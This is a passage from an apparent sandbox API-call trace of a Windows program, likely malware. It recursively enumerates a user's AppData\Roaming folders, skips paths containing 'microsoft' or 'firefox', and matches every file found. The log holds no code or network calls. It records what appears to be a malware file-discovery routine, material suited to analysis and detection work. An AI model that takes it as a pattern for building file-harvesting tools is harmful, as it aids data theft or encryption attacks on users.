pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype" [0083.178] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned 0 [0083.179] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="microsoft") returned 0x0 [0083.179] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="firefox") returned 0x0 [0083.179] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*" [0083.179] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b20 [0083.179] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.179] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.179] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="RootTools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools" [0083.179] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned 0 [0083.179] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="microsoft") returned 0x0 [0083.179] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="firefox") returned 0x0 [0083.179] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*" [0083.179] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.179] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.179] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.179] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.179] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.179] Sleep (dwMilliseconds=0x0) [0083.179] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.179] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.179] Sleep (dwMilliseconds=0x0) [0083.179] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.179] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0 [0083.180] FindClose (in: hFindFile=0x57f3e8 | out: hFindFile=0x57f3e8) returned 1 [0083.180] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.180] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 0x586b20 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.pptx", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="83D2u8nDKooEEZ.avi", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="9cIv.mp3", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.ppt", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="a3ZfsA3.bmp", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathMatchSpecW (pszFile="a6-2v.swf", pszSpec="*") returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.180] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.180] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.180] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.180] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.180] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.180] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.180] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.180] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.180] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.180] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.180] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.180] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.180] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.180] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.180] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.181] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.181] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.181] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.181] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.181] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.181] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] PathMatchSpecW (pszFile="glob.js", pszSpec="*") returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] PathMatchSpecW (pszFile="glob.settings.js", pszSpec="*") returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.181] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.181] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.181] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*") returned 1 [0083.181] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.181] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.181] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.182] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.182] PathMatchSpecW (pszFile="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", pszSpec="*") returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.182] PathMatchSpecW (pszFile="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", pszSpec="*") returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.182] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.182] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.182] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.182] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.182] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.182] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.182] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.182] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.182] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.182] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.182] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.182] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.182] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.182] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.182] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.182] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.182] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.183] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.183] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.183] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.183] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.183] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.183] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.183] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.183] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.183] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.183] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.183] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.183] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.183] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.183] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.183] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.183] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.gif", pszSpec="*") returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.183] PathMatchSpecW (pszFile="bGn 5cfhGh1UZr.wav", pszSpec="*") returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.183] PathMatchSpecW (pszFile="cL5q.m4a", pszSpec="*") returned 1 [0083.183] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="Cq3qmzP.mp4", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="fVg-V.m4a", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="fyH-uEyk.gif", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.gif", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="h4yUoS3CBTrCBZSc.mp4", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.184] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: 